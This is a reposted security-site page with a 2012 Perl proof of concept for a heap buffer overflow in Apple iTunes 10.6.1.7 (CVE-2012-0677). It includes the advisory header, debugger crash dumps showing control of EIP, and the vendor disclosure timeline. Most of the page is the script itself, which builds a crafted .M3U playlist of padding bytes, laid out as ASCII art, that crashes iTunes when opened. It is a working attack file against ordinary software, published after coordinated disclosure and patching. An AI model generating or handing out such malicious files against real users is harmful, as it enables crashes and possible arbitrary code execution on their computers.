首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple iTunes 10.6.1.7 M3U Playlist Buffer Overflow
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2012-06-13  
#!/usr/bin/perl
#
#
# Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow
#
#
# Vendor: Apple Inc.
# Product web page: http://www.apple.com
# Affected version: 10.6.1.7 and 10.6.0.40
#
# Summary: iTunes is a free application for your Mac or PC. It lets you
# organize and play digital music and video on your computer. It can
# automatically download new music, app, and book purchases across all
# your devices and computers. And it’s a store that has everything you
# need to be entertained. Anywhere. Anytime.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a playlist file, which can be exploited to cause a heap based buffer
# overflow when a user opens e.g. a specially crafted .M3U file. Successful
# exploitation could allow execution of arbitrary code on the affected node.
#
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# (940.fc0): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20
# eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
# <Unloaded_Card.dll>+0x41414130:
# 41414141 ??              ???
#
# ~~~
#
# (6b0.a04): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d
# eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
# Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -
# CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:
# 0187deec 8b00            mov     eax,dword ptr [eax]  ds:0023:41414141=????????
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
# Tested on: Microsoft Windows XP Professional SP3 EN (32bit)
#            Microsoft Windows 7 Ultimate SP1 EN (64bit)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [13.03.2012] Vulnerability discovered in version 10.6.0.40.
# [29.03.2012] Vulnerability present in version 10.6.1.7.
# [11.05.2012] Vendor contacted.
# [11.05.2012] Vendor responds asking more details.
# [11.05.2012] Sent detailed information and PoC code to the vendor.
# [12.05.2012] Vendor begins investigation.
# [14.05.2012] Asked vendor for confirmation.
# [17.05.2012] Vendor confirms the vulnerability, developing patch.
# [17.05.2012] Requested a scheduled patch release date from vendor.
# [18.05.2012] Vendor replies.
# [06.06.2012] Asked vendor for status update.
# [08.06.2012] Vendor shares information about security update.
# [11.06.2012] Vendor releases version 10.6.3 to address this issue.
# [12.06.2012] Coordinated public security advisory released.
#
#
# Advisory ID: ZSL-2012-5093
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2012-5093.php
# Advisory TXT: http://www.zeroscience.mk/codes/itunes_bof.txt
#
# Apple ID: APPLE-SA-2012-06-11-1
# Apple Advisory #1: http://support.apple.com/kb/HT5318
# Apple Advisory #2: http://support.apple.com/kb/HT1222
#
# CVE ID: CVE-2012-0677
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0677
#
#
# 13.03.2012
#

use strict;

my $FILE = "HIEROGLYPH.m3u";
my $AN = "\x44\x44\x44\x44";
my $EGYPTIAN = "\x43" x 16560;
my $LIKE = "\x42\x42\x42\x42";






                                                         #######
                                                     #OOOOOOOOOOY
                                                   my $WALK="\x23\x45".                       "\x58\x54\x4D\x33".
                                                  "\x55\x0D\x41\x41\x41".                   "\x41\x41\x41".
                                                "\x41\x41\x41\x41\x41\x41".                 "\x41\x41".
                                              "\x41\x41\x41\x41".    "\x41".                "\x41\x41".
                                             "\x41\x41\x41\x41\x41\x41\x41".                "\x41\x41".
                                            "\x41\x41\x41\x41\x41\x41\x41\x41".            "\x41\x41".
                                           "\x41\x41\x41\x41\x41\x41\x41\x41".             "\x41\x41".
                                          "\x41\x41\x41\x41\x41\x41\x41\x41".              "\x41\x41".
                                         "\x41\x41\x41\x41\x41\x41\x41\x41".               "\x41\x41".
                                        "\x41\x41\x41\x41\x41\x41\x41\x41".                "\x41\x41".
                                        "\x41\x41\x41\x41\x41\x41".    "\x41".            "\x41\x41".
                                                    "\x41\x41\x41".      "\x41".          "\x41\x41".
                       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                     "\x41\x41".           "\x41\x41\x41\x41\x41\x41\x41\x41".
                     "\x41\x41".             "\x41\x41\x41\x41\x41\x41\x41".
                    "\x41\x41".              "\x41\x41\x41\x41\x41\x41\x41".
                    "\x41\x41".                "\x41\x41\x41\x41\x41\x41".
                    "\x41\x41".                "\x41\x41\x41\x41\x41\x41".
                    "\x41\x41".                  "\x41\x41\x41\x41\x41".
                    "\x41\x41".                  "\x41\x41\x41\x41\x41".
                   "\x41\x41".                   "\x41\x41\x41\x41\x41".
                   "\x41\x41".                     "\x41\x41\x41\x41".
               "\x41\x41\x41".                     "\x41\x41\x41\x41".
         "\x41\x41\x41\x41".                       "\x41\x41\x41\x41".
                                                     "\x41\x41\x41".
                                                     "\x41\x41\x41".
                                                     "\x41\x41\x41".
                                                    "\x41\x41\x41\x41".
                                                    "\x41\x41\x41\x41".
                                                  "\x41\x41\x41\x41\x41".
                                                  "\x41\x41\x41\x41\x41".
                                                 "\x41\x41\x41\x41\x41\x41".
                                               "\x41\x41\x41\x41\x41\x41\x41".
                                               "\x41\x41\x41\x41\x41\x41\x41".
                                              "\x41\x41\x41\x41\x41\x41\x41\x41".
                                              "\x41\x41\x41\x41\x41\x41\x41\x41".
                                             "\x41\x41\x41\x41\x41\x41\x41\x41".
                                           "\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                           "\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                    "\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41".
                                   "\x41\x41\x41\x41\x41\x41".        "\x41\x41\x41".
                                  "\x41\x41\x41\x41\x41".               "\x41\x41\x41".
                                        "\x41\x41\x41".                 "\x41\x41\x41".
                                        "\x41\x41\x41".                  "\x41\x41\x41".
                                       "\x41\x41\x41".                    "\x41\x41\x41".
                                       "\x41\x41\x41".                    "\x41\x41\x41".
                                        "\x41\x41".                          "\x41\x41".
                                       "\x41\x41".                           "\x41\x41".
                                       "\x41\x41".                           "\x41\x41".
                                      "\x41\x41".                             "\x41\x41".
                                      "\x41\x41".                              "\x41\x41".
                                     "\x41\x41".                               "\x41\x41".
                                    "\x41\x41".                                 "\x41\x41".
                                   "\x41\x41".                                  "\x41\x41".
                                  "\x41\x41".                                    "\x41\x41".
                                 "\x41\x41".                                      "\x41\x41".
                                "\x41\x41".                                       "\x41\x41".
                               "\x41\x41".                                         "\x41\x41".
                               "\x41\x41".                                          "\x41\x41".
                              "\x41\x41".                                           "\x41\x41".
                              "\x41\x41".                                            "\x41\x41".
                             "\x41\x41\x41".                                        "\x41\x41\x41".
                            "\x41\x41\x41\x41".                                     "\x41\x41\x41\x41".
                            "\x41\x41\x41\x41\x41".                                 "\x41\x41\x41\x41\x41".
                              "\x41\x41\x41\x41\x41\x41".                             "\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41" x 7691;








my $CRYPT = $WALK.$LIKE.$AN.$EGYPTIAN;
print "\n\n[+] Creating $FILE file...\n";
open ZSL, ">./$FILE" || die "\n[-] Can't open $FILE: $!\n\n";
print ZSL $CRYPT;
print "\n[+] File successfully composed!\n\n";
close ZSL;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·F5 BIG-IP SSH Private Key Expo
·Edimax IC-3030iWn Authenticati
·Total Video Player V1.31 [.flv
·Total Video Player V1.31 Memmo
·WordPress plugin Foxypress upl
·MySQL Remote Root Authenticati
·Wyse Machine Remote Power off
·F5 BIG-IP Remote Root Authenti
·Opera 12 Local Arbitrary Downl
·Symantec Web Gateway 5.0.2.8 i
·Windows 8 Developer Preview DE
·XM Easy Personal FTP Server v
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved